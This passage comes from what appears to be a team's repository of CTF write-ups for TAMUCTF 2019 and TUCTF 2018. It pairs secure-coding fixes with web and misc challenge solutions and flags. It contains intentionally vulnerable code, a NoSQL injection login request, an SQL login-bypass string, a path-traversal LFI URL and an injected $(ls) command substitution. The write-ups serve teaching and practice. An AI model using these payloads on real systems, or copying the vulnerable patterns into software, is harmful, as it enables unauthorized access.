say, that's invalid login info!"; 37 | } 38 | } 39 | $conn->close(); 40 | } 41 | else 42 | echo "Must supply username and password..."; 43 | echo ""; 44 | ?> 45 | ``` 46 | 47 | Here is the diff with the secured code : 48 | ```diff 49 | 13,14c13,14 50 | < $user = $_POST['username']; 51 | < $pass = $_POST['password']; 52 | --- 53 | > $user = mysqli_real_escape_string($conn, $_POST['username']); 54 | > $pass = mysqli_real_escape_string($conn,$_POST['password']); 55 | ``` 56 | 57 | **Flag:** 58 | gigem{the_best_damn_sql_anywhere} 59 | 60 | -------------------------------------------------------------------------------- /TAMUCTF 2019/Secure Coding/loginapp2.md: -------------------------------------------------------------------------------- 1 | ## LoginApp2 - Secure Coding 2 | 3 | **Challenge:** : [https://gitlab.tamuctf.com/root/loginapp](https://gitlab.tamuctf.com/root/loginapp) 4 | **Solved by:** Neolex 5 | 6 | **Solution:** 7 | The goal of this challenge is to secure the login app2 from the web challenges. 8 | Here is the vulnerable script: 9 | ```python 10 | // server.js 11 | 12 | const initDb = require("./db").initDb; 13 | const getDb = require("./db").getDb; 14 | const express = require('express'); 15 | const app = express(); 16 | var bodyParser = require('body-parser') 17 | app.use(bodyParser.json()) 18 | 19 | var path = require("path"); 20 | 21 | const PORT = 4000; 22 | 23 | initDb(function (err) { 24 | app.get('/', function(req, res) { 25 | res.sendFile(path.join(__dirname+'/index.html')); 26 | }); 27 | 28 | app.post('/login', function (req, res) { 29 | 30 | const db = getDb(); 31 | c = db.db('test'); 32 | 33 | var query = { 34 | username: req.body.username, 35 | password: req.body.password 36 | } 37 | 38 | c.collection('users').findOne(query, function (err, user) { 39 | if(user == null) { 40 | res.send(JSON.stringify("Login Failed")) 41 | } 42 | else { 43 | resp = "Welcome: " + user['username'] + "!"; 44 | res.send(JSON.stringify(resp)); 45 | } 46 | }); 47 | }); 48 | 49 | app.listen(PORT, function (err) { 50 | const db = getDb(); 51 | 52 | user = {username: 'bob', password: 'lVeYMg4U4$@L'} 53 | admin = {username: 'admin', password: '945IYMib!u@u'} 54 | 55 | c = db.db('test'); 56 | c.collection('users').insertOne(user) 57 | c.collection('users').insertOne(admin) 58 | 59 | if (err) { 60 | throw err; // 61 | } 62 | console.log("Up and running on port " + PORT); 63 | }); 64 | }); 65 | ``` 66 | and here is the diff with the secured one : 67 | ```diff 68 | 8a9 69 | > var sanitize = require('mongo-sanitize'); 70 | 25,26c26,27 71 | < username: req.body.username, 72 | < password: req.body.password 73 | --- 74 | > username: sanitize(req.body.username), 75 | > password: sanitize(req.body.password) 76 | 28d28 77 | < 78 | 79 | ``` 80 | **Flag:** 81 | gigem{3y3_SQL_n0w_6b95d3035a3755a} 82 | 83 | -------------------------------------------------------------------------------- /TAMUCTF 2019/Secure Coding/pwn.md: -------------------------------------------------------------------------------- 1 | ## PWN - Secure Coding 2 | 3 | **Challenge:** : [https://gitlab.tamuctf.com/root/pwn](https://gitlab.tamuctf.com/root/pwn) 4 | **Difficulty:**: easy 5 | **Solved by:** Neolex 6 | 7 | **Solution:** 8 | The goal of this challenge is to secure this vulnerable script: 9 | ```C 10 | #include 11 | #include 12 | 13 | void echo() 14 | { 15 | printf("%s", "Enter a word to be echoed:\n"); 16 | char buf[128]; 17 | gets(buf); 18 | printf("%s\n", buf); 19 | } 20 | 21 | int main() 22 | { 23 | echo(); 24 | } 25 | ``` 26 | Here is the diff with the secured code : 27 | ```diff 28 | 6c6 29 | < printf("%s", "Enter a word to be echoed:\n"); 30 | --- 31 | > printf("Enter a word to be echoed:\n"); 32 | 8,9c8,10 33 | < gets(buf); 34 | < printf("%s\n", buf); 35 | --- 36 | > if(fgets(buf,128, stdin) != NULL){ 37 | > printf("%s\n", buf); 38 | > } 39 | ``` 40 | 41 | **Flag:** 42 | gigem{check_that_buffer_size_baby} 43 | 44 | -------------------------------------------------------------------------------- /TAMUCTF 2019/Secure Coding/science.md: -------------------------------------------------------------------------------- 1 | ## Science - Secure Coding 2 | 3 | **Challenge:** : [https://gitlab.tamuctf.com/root/science](https://gitlab.tamuctf.com/root/science) 4 | **Difficulty:**: easy 5 | **Solved by:** Neolex 6 | 7 | **Solution:** 8 | The goal of this challenge is to secure the vulnerable Flask script of the web challenge Science! . 9 | Here is the vulnerable script : 10 | ```python 11 | import requests 12 | import json 13 | import sys 14 | from tamuctf import app 15 | from flask import Flask, render_template, request, jsonify, render_template_string 16 | 17 | @app.route('/') 18 | @app.route('/index') 19 | def index(): 20 | 21 | return render_template('index.html') 22 | 23 | @app.route('/science', methods=['POST']) 24 | def science(): 25 | try: 26 | chem1 = request.form['chem1'] 27 | chem2 = request.form['chem2'] 28 | template = ''' 29 |
30 |

The result of combining {} and {} is:


31 |
32 | '''.format(chem1, chem2) 33 | 34 | return render_template_string(template, dir=dir, help=help, locals=locals) 35 | except: 36 | return "Something went wrong" 37 | 38 | ``` 39 | Here is the diff with the secured code : 40 | ```diff 41 | 20c20 42 | <

The result of combining {} and {} is:


43 | --- 44 | >

The result of combining {{chem1}} and {{chem2}} is:


45 | 22,24c22,23 46 | < '''.format(chem1, chem2) 47 | < 48 | < return render_template_string(template, dir=dir, help=help, locals=locals) 49 | --- 50 | > ''' 51 | > return render_template_string(template,chem1=chem1,chem2=chem2,dir=dir, help=help, locals=locals) 52 | 27d25 53 | < 54 | ``` 55 | 56 | **Flag:** 57 | gigem{br0k3n_fl4sk_2d88bb862569} 58 | 59 | -------------------------------------------------------------------------------- /TAMUCTF 2019/Web/images/loginapp2-request.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ImperiumCTF/Writeups/1a4370560b263623f3ad3d3aa1a9189bab143637/TAMUCTF 2019/Web/images/loginapp2-request.png -------------------------------------------------------------------------------- /TAMUCTF 2019/Web/loginapp2.md: -------------------------------------------------------------------------------- 1 | ## LoginApp2 - Web 2 | 3 | **Challenge:** : [http://web4.tamuctf.com](http://web4.tamuctf.com) 4 | **Difficulty:** medium 5 | **Solved by:** Neolex 6 | 7 | **Solution:** 8 | This challenge is just an exploitation of a nosql injection on login page. 9 | Here is the request to send : 10 | ``` 11 | POST /login HTTP/1.1 12 | Host: web4.tamuctf.com 13 | Content-Length: 63 14 | Accept: application/json, text/javascript, _/_; q=0.01 15 | Origin: [http://web4.tamuctf.com/](http://web4.tamuctf.com/ "http://web4.tamuctf.com/") X-Requested-With: XMLHttpRequest 16 | User-Agent: Googlebot/2.1 (+[http://www.googlebot.com/bot.html](http://www.googlebot.com/bot.html "http://www.googlebot.com/bot.html")) 17 | Content-Type: application/json;charset=UTF-8 18 | Referer: [http://web4.tamuctf.com/](http://web4.tamuctf.com/ "http://web4.tamuctf.com/") 19 | Accept-Encoding: gzip, deflate 20 | Accept-Language: en-US,en;q=0.9 21 | Connection: close 22 | { 23 | "username": "admin", 24 | "password": {"$gt": ""} 25 | } 26 | ``` 27 | And we get access to the admin page with the flag : 28 | ![](./images/loginapp2-request.png) 29 | **Flag:** 30 | gigem{n0_sql?_n0_pr0bl3m_8a8651c31f16f5dea} 31 | 32 | -------------------------------------------------------------------------------- /TUCTF 2018/Misc/hardDOS.md: -------------------------------------------------------------------------------- 1 | ## hardDOS - Misc 497: 2 | 3 | **Description:** Paying attention is mitey important! (Difficulty: Hard) 4 | **Challenge:** nc 18.216.100.42 12345 5 | **Difficulty:** Medium 6 | **Solved by:** Tahar & Yanis 7 | 8 | **Solution:** 9 | We start by connecting to the given target, we follow the instructions that are printed out on the remote server and then choose the option **2**. Then we choose **y**. We start by injecting the following payload to get all files listed in the challenge's server: ```$(ls)```. 10 | 11 | We check all the files by running ```file FILENAME``` so we can check the type of every file following the challenge instructions!! We find an interesting file **GRAPHICS.COM**. 12 | 13 | We run the **strings** command to see what is in there since we can't use the **type** command: 14 | ```strings GRAPHICS.COM``` 15 | 16 | **Flag:** 17 | TUCTF{4LW4Y5_1NF3C7_7H353_19742_BY735} 18 | -------------------------------------------------------------------------------- /TUCTF 2018/README.md: -------------------------------------------------------------------------------- 1 | ## TUCTF 2018: 2 | 3 | TU CTF is an introductory CTF for teams that want to build their experience. We will have the standard categories of Web, Forensics, Crypto, RE, and Exploit, as well as some other categories we don't want to reveal just yet. 4 | -------------------------------------------------------------------------------- /TUCTF 2018/Reverse/Danger_Zone.md: -------------------------------------------------------------------------------- 1 | ## Danger Zone - Reverse 112: 2 | 3 | **Description:** Legend says, this program was written by Kenny Loggins himself. 4 | **Challenge:** dangerzone.pyc 5 | **Difficulty:** Easy 6 | **Solved by:** Tahar 7 | 8 | **Solution:** 9 | We start by downloading the challenge file **dangerzone.pyc**. Started googling for a trick to decompile the **Python Compiled File PYC**. 10 | 11 | I get to know about a Python module under the name of **uncompyle6**. Went to its official page and installed it to my linux box! I followed the documentation and managed to decompile the challenge file to a readable Python Code =) 12 | 13 | I just started reading that Python Code and reversing it from the top to the bottom until I reached the end and the flag =) 14 | 15 | **Flag:** 16 | TUCTF{r3d_l1n3_0v3rl04d} 17 | -------------------------------------------------------------------------------- /TUCTF 2018/Reverse/YeahRight.md: -------------------------------------------------------------------------------- 1 | ## Yeahright - Reverse 149: 2 | 3 | **Description:** What an insensitive little program. Show it who's boss! 4 | **Challenge:** yeahright + flag + nc 18.224.3.130 12345 5 | **Difficulty:** Easy 6 | **Solved by:** Tahar 7 | 8 | **Solution:** 9 | We download both files, the **flag** file isn't really an important file for the Challenge but it is good to test out if you are right or not! 10 | 11 | I started by reverse engineering the **yeahright** binary file after using the **file** command to get some usefull information before reversing it!! 12 | 13 | By reversing the file we find the needed password so when we connect to the online challenge service we use it and get the real **flag**. 14 | 15 | I tried the founded password and it just worked! Another simple trick is to use a **HEX Editor** It is easy and fast to get the password!! or you can use **IDA Pro** a GUI based Reverse Engineering framework that will get the job done in an easy and fast way!! Instead of using Radare2 or GDB or that kind of CLI based toolkits. 16 | 17 | **Flag:** 18 | TUCTF{n07_my_fl46_n07_my_pr0bl3m} 19 | -------------------------------------------------------------------------------- /TUCTF 2018/Web/Colonel_Mustard's_Simple_Signin.md: -------------------------------------------------------------------------------- 1 | ## Colonel Mustard's Simple Signin - Web 172: 2 | 3 | **Description:** We know Col Mustard is up to something--can you find a way in to tell us what? 4 | **Challenge:** http://13.59.239.132/ 5 | **Difficulty:** Easy 6 | **Solved by:** Tahar 7 | 8 | **Solution:** 9 | We open up the challenge URL as usual, we notice the same login form! But of course it shouldn't be the same solution or same challenge =) 10 | From previous experience as usual from too many CTFs, most of those logins forms are meant to say **SQLi Form Login Bypass** and it means bypassing the login form by injecting a **Structure Query Language** Payload. We use the following payload and boom flag: 11 | ```' or ''='``` 12 | ```' or ''='``` 13 | 14 | **Flag:** 15 | TUCTF{1_4ccu53_c0l0n3l_mu574rd_w17h_7h3_r0p3_1n_7h3_l061n} 16 | -------------------------------------------------------------------------------- /TUCTF 2018/Web/Easter_Egg:_Copper_Gate.md: -------------------------------------------------------------------------------- 1 | ## Easter Egg: Copper Gate - Web 258: 2 | 3 | **Description:** How did I end up here? - Joker 4 | **Challenge:** http://18.191.227.167/ 5 | **Difficulty:** Easy 6 | **Solved by:** Tahar 7 | 8 | **Solution:** 9 | We open the URL, do a simple directory bruteforcing or try to guess it if you are lucky enough to save time! Found an interesting folder **.git**, Downloaded a file **http://18.191.227.167/.git/index**, opened this file using a **HEX Editor** and found an interesting folder in it!! 10 | 11 | **http://18.191.227.167/enterthecoppergate/gate.html** When we open this file we decode the **Base64 String** and done! 12 | 13 | **Flag:** 14 | TUCTF{W3lc0m3_T0_Th3_04515_Th3_C0pp3r_K3y} 15 | -------------------------------------------------------------------------------- /TUCTF 2018/Web/Easter_Egg:_Crystal_Gate.md: -------------------------------------------------------------------------------- 1 | ## Easter Egg: Crystal Gate - Web 446: 2 | 3 | **Description:** I don't wanna go anywhere. 4 | **Challenge:** http://18.191.227.167/ 5 | **Difficulty:** Easy 6 | **Solved by:** Tahar 7 | 8 | **Solution:** 9 | Open the URL, after simple and quick directory bruteforcing we find a directory **.git**. We download the Index file: **http://18.191.227.167/.git/index**. We open that downloaded file using a Hex Editor and theb we find an interesting folder/file!! 10 | 11 | 12 | **http://18.191.227.167/crystalsfordays/traversethebridge.php** The hint is saying **Note2: I can't seem to remember the param. It's "file"** We use that file parameter and exploit it. It is an **LFI Vulnerability (Local File Inclusion)**. 13 | 14 | **http://18.191.227.167/crystalsfordays/traversethebridge.php?file=** We use this URL to exploit the vulnerability, and it becomes: 15 | ```http://18.191.227.167/crystalsfordays/traversethebridge.php?file=../../```. We find too many files and the interesting one was **TheEgg.html**. 16 | 17 | When we open that file: 18 | **http://18.191.227.167/crystalsfordays/traversethebridge.php?file=../../TheEgg.html** we get the flag! 19 | 20 | **Flag:** 21 | TUCTF{3_15_4_M4G1C_NUMB3R_7H3_crys74L_k3Y_15_y0ur5!} 22 | -------------------------------------------------------------------------------- /TUCTF 2018/Web/Easter_Egg:_Jade_Gate.md: -------------------------------------------------------------------------------- 1 | ## Easter Egg: Jade Gate - Web 371: 2 | 3 | **Description:** Gotta make sure I log my changes. - Joker 4 | **Challenge:** http://18.191.227.167/ 5 | **Difficulty:** Easy 6 | **Solved by:** Tahar 7 | 8 | **Solution:** 9 | We open the URL as usual! Simple directory bruteforce will show you a folder **.git**. Opened the folder and downloaded a file: **http://18.191.227.167/.git/index**. Used a **Hex Editor** to open that index file and found an interesting folder & file! 10 | 11 | **http://18.191.227.167/youfoundthejadegate/gate.html** The flag is in your screen :P 12 | 13 | **Flag:** 14 | TUCTF{S0_Th1s_D035n7_533m_l1k3_175_f41r_8u7_wh0_3v3r_s41d_l1f3_15_f41r?} 15 | -------------------------------------------------------------------------------- /TUCTF 2018/Web/Miss_Scarlet's_Resume_Requests.md: -------------------------------------------------------------------------------- 1 | ## Miss Scarlet's Resume Requests - Web 398: 2 | 3 | **Description:** Something is up with Miss's Scarlet's acting site. Maybe you can take a look? 4 | **Challenge:** http://18.220.239.106/ 5 | **Difficulty:** Easy 6 | **Solved by:** Tahar 7 | 8 | **Solution:** 9 | Open the URL, and head to: **http://18.220.239.106/contact.php**. And then we go to **http://18.220.239.106/Boddy/**. 10 | We open the source code of the web page and find something interesting hinting for the HTTP Method. We do a simple **CURL POST Request and get the Flag!!** 11 | 12 | ```curl -X POST http://18.220.239.106/Boddy/``` 13 | 14 | **Flag:** 15 | TUCTF{1_4ccu53_m155_5c4rl37_w17h_7h3_kn1f3_1n_7h3_h77p_r3qu357} 16 | -------------------------------------------------------------------------------- /TUCTF 2018/Web/Mr._Green's_Weird_Website.md: -------------------------------------------------------------------------------- 1 | ## Mr. Green's Weird Website - Web 79: 2 | 3 | **Description:** While investigating Mr. Green for something completely unrelated, we found this login page. Maybe you can find a way in? 4 | **Challenge:** http://18.219.196.70/ 5 | **Difficulty:** Easy 6 | **Solved by:** Tahar 7 | 8 | **Solution:** 9 | We open up the given URL of the web challenge, we notice a simple login form! From previous experience in CTFs by just trying the credentials **admin:admin** we get a successful Login!! 10 | 11 | **Flag:** 12 | TUCTF{1_4ccu53_mr._6r33n_w17h_7h3_b4d_p455w0rd_1n_7h3_l061n} 13 | -------------------------------------------------------------------------------- /TUCTF 2018/Web/Mrs._White's_Messy_Maids.md: -------------------------------------------------------------------------------- 1 | ## Mrs. White's Messy Maids - Web 25: 2 | 3 | **Description:** Mrs. White's simple website might be hiding some murderous intentions... 4 | **Challenge:** http://18.218.152.56/ 5 | **Difficulty:** Easy 6 | **Solved by:** Tahar 7 | 8 | **Solution:** 9 | We open up the webapp challenge URL, and go directly to the **Source Code** of the Website challenge! We see an important comment saying something about **/Boddy** and that means it is a web directory in the server! Checking the folder will give the flag =) 10 | 11 | **Flag:** 12 | TUCTF{1_4ccu53_Mr5._Wh173_w17h_7h3_c4ndl3571ck_1n_7h3_c0mm3n75} 13 | -------------------------------------------------------------------------------- /TUCTF 2018/Web/Professor_Plum's_Ravenous_Researcher.md: -------------------------------------------------------------------------------- 1 | ## Professor Plum's Ravenous Researcher - Web 474: 2 | 3 | **Description:** Professor Plum is hiring! Maybe you can get the job! 4 | **Challenge:** http://18.223.185.148/ 5 | **Difficulty:** Medium 6 | **Solved by:** Tahar 7 | 8 | **Solution:** 9 | That was the hardest challenge between all WEB Challenges!! Took too many hours to get it done :-3 10 | We open the URL as we used to do with **Web Challs**. Following the redirections we get into this page: **http://18.223.185.148/search.php**. I've received a hint from an Organizer, saying that I must link the other web challs names to solve this one and do more OSINT!!. And now, ideas started getting into my mind =) 11 | 12 | Googled too many times about the names of the other web challenges, and I found out that it is a **Clue Board Game**. And that's the official WikiPedia page that helped me a lot to get this challenge done: 13 | ```https://en.wikipedia.org/wiki/Cluedo``` 14 | 15 | Since, the challenge is talking about the locations, so I went directly to the **Rooms** section! ```billiard room``` was the right location!! It worked and now the page is saying something else!! Now, I started overthinking! 16 | 17 | I thinked about running BurpSuite so I can play with that WebApplication the right way ;-) 18 | 19 | I started getting angry and frustrated and damn tired and sleepy (It was 4AM), I just noticed that there is a parameter being sent to the server with the **Cookies Value: 0**. What I did is that I just changed that cookie parameter from 0 to **1** and boom it worked!! Finally x'D 20 | 21 | **Flag:** 22 | TUCTF{1_4ccu53_pr0f3550r_plum_w17h_7h3_c00k13_1n_7h3_b1ll14rd_r00m} 23 | --------------------------------------------------------------------------------